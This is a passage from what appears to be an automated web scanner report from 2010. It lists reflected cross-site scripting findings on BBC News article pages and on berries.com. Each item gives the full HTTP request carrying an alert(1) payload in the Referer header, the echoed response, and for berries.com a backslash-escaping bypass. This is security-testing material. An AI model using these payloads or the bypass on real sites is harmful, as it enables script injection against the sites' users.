...[SNIP]...

2.191. http://www.bbc.co.uk/news/uk-england-lancashire-12007100 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-england-lancashire-12007100

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be77c'-alert(1)-'2ce188aab14 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-england-lancashire-12007100 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=be77c'-alert(1)-'2ce188aab14

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:07 GMT
Keep-Alive: timeout=10, max=765
Expires: Thu, 16 Dec 2010 19:28:07 GMT
Connection: close
Content-Length: 61931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527687000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=be77c'-alert(1)-'2ce188aab14',
       section: 'lancashire',
       sectionPath: '/England/Lancashire',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12007100',
       assetType: 'story',
       uri: '/ne
...[SNIP]...

2.192. http://www.bbc.co.uk/news/uk-england-london-11990646 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-england-london-11990646

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53f24'-alert(1)-'f304acde57e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-england-london-11990646 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=53f24'-alert(1)-'f304acde57e

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:06 GMT
Keep-Alive: timeout=10, max=798
Expires: Thu, 16 Dec 2010 19:28:06 GMT
Connection: close
Content-Length: 63885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527686000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=53f24'-alert(1)-'f304acde57e',
       section: 'london',
       sectionPath: '/England/London',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '11990646',
       assetType: 'story',
       uri: '/news/uk-en
...[SNIP]...

2.193. http://www.bbc.co.uk/news/uk-scotland-12000741 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-scotland-12000741

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 303cc'-alert(1)-'35ec21c9b25 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-scotland-12000741 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=303cc'-alert(1)-'35ec21c9b25

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:15 GMT
Keep-Alive: timeout=10, max=798
Expires: Thu, 16 Dec 2010 19:28:15 GMT
Connection: close
Content-Length: 73257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527695000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=303cc'-alert(1)-'35ec21c9b25',
       section: 'scotland',
       sectionPath: '/Scotland',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12000741',
       assetType: 'story',
       uri: '/news/uk-scotla
...[SNIP]...

2.194. http://www.bbc.co.uk/news/world-africa-12007523 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12007523

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8f8a'-alert(1)-'cdad15bdd59 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-africa-12007523 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=d8f8a'-alert(1)-'cdad15bdd59

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:27:57 GMT
Keep-Alive: timeout=10, max=697
Expires: Thu, 16 Dec 2010 19:27:57 GMT
Connection: close
Content-Length: 63738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527677000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=d8f8a'-alert(1)-'cdad15bdd59',
       section: 'africa',
       sectionPath: '/World/Africa',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12007523',
       assetType: 'story',
       uri: '/news/world-a
...[SNIP]...

2.195. http://www.bbc.co.uk/news/world-europe-11342247 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-europe-11342247

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 755e0'-alert(1)-'48e3cc7120b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-europe-11342247 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=755e0'-alert(1)-'48e3cc7120b

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:05 GMT
Keep-Alive: timeout=10, max=735
Expires: Thu, 16 Dec 2010 19:28:05 GMT
Connection: close
Content-Length: 63579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527685000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=755e0'-alert(1)-'48e3cc7120b',
       section: 'europe',
       sectionPath: '/World/Europe',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '11342247',
       assetType: 'story',
       uri: '/news/world-e
...[SNIP]...

2.196. http://www.bbc.co.uk/news/world-europe-12011212 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-europe-12011212

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8dad5'-alert(1)-'dd33a491687 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-europe-12011212 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=8dad5'-alert(1)-'dd33a491687

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:02 GMT
Keep-Alive: timeout=10, max=776
Expires: Thu, 16 Dec 2010 19:28:02 GMT
Connection: close
Content-Length: 57121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527682000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=8dad5'-alert(1)-'dd33a491687',
       section: 'europe',
       sectionPath: '/World/Europe',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12011212',
       assetType: 'story',
       uri: '/news/world-e
...[SNIP]...

2.197. http://www.bbc.co.uk/news/world-europe-12013182 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-europe-12013182

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c49c8'-alert(1)-'efc9e7f26ef was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-europe-12013182 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=c49c8'-alert(1)-'efc9e7f26ef

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:27:59 GMT
Keep-Alive: timeout=10, max=785
Expires: Thu, 16 Dec 2010 19:27:59 GMT
Connection: close
Content-Length: 56169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527679000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=c49c8'-alert(1)-'efc9e7f26ef',
       section: 'europe',
       sectionPath: '/World/Europe',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12013182',
       assetType: 'story',
       uri: '/news/world-e
...[SNIP]...

2.198. http://www.bbc.co.uk/news/world-middle-east-12011660 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12011660

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67f1f'-alert(1)-'72d5eda32db was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-middle-east-12011660 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=67f1f'-alert(1)-'72d5eda32db

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:27:59 GMT
Keep-Alive: timeout=10, max=787
Expires: Thu, 16 Dec 2010 19:27:59 GMT
Connection: close
Content-Length: 56367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527679000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=67f1f'-alert(1)-'72d5eda32db',
       section: 'middle-east',
       sectionPath: '/World/Middle East',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12011660',
       assetType: 'story',
       uri: '/ne
...[SNIP]...

2.199. http://www.bbc.co.uk/news/world-south-asia-12006092 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12006092

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6363a'-alert(1)-'a497e3d73a6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-south-asia-12006092 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=6363a'-alert(1)-'a497e3d73a6

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:02 GMT
Keep-Alive: timeout=10, max=740
Expires: Thu, 16 Dec 2010 19:28:02 GMT
Connection: close
Content-Length: 60534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527682000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=6363a'-alert(1)-'a497e3d73a6',
       section: 'south-asia',
       sectionPath: '/World/South Asia',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12006092',
       assetType: 'story',
       uri: '/news
...[SNIP]...

2.200. http://www.bbc.co.uk/news/world-us-canada-12012762 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12012762

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebd52'-alert(1)-'dda1ef52cbd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12012762 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=ebd52'-alert(1)-'dda1ef52cbd

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:27:56 GMT
Keep-Alive: timeout=10, max=784
Expires: Thu, 16 Dec 2010 19:27:56 GMT
Connection: close
Content-Length: 66889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527676000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=ebd52'-alert(1)-'dda1ef52cbd',
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12012762',
       assetType: 'story',
       uri:
...[SNIP]...

2.201. http://www.bbc.co.uk/news/world-us-canada-12013186 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12013186

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload feae0'-alert(1)-'29986959de6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12013186 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=feae0'-alert(1)-'29986959de6

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:27:54 GMT
Keep-Alive: timeout=10, max=756
Expires: Thu, 16 Dec 2010 19:27:54 GMT
Connection: close
Content-Length: 53297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527674000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=feae0'-alert(1)-'29986959de6',
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12013186',
       assetType: 'story',
       uri:
...[SNIP]...

2.202. http://www.berries.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.berries.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdcde\"%3balert(1)//64278522827 was submitted in the Referer HTTP header. This input was echoed as fdcde\\";alert(1)//64278522827 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

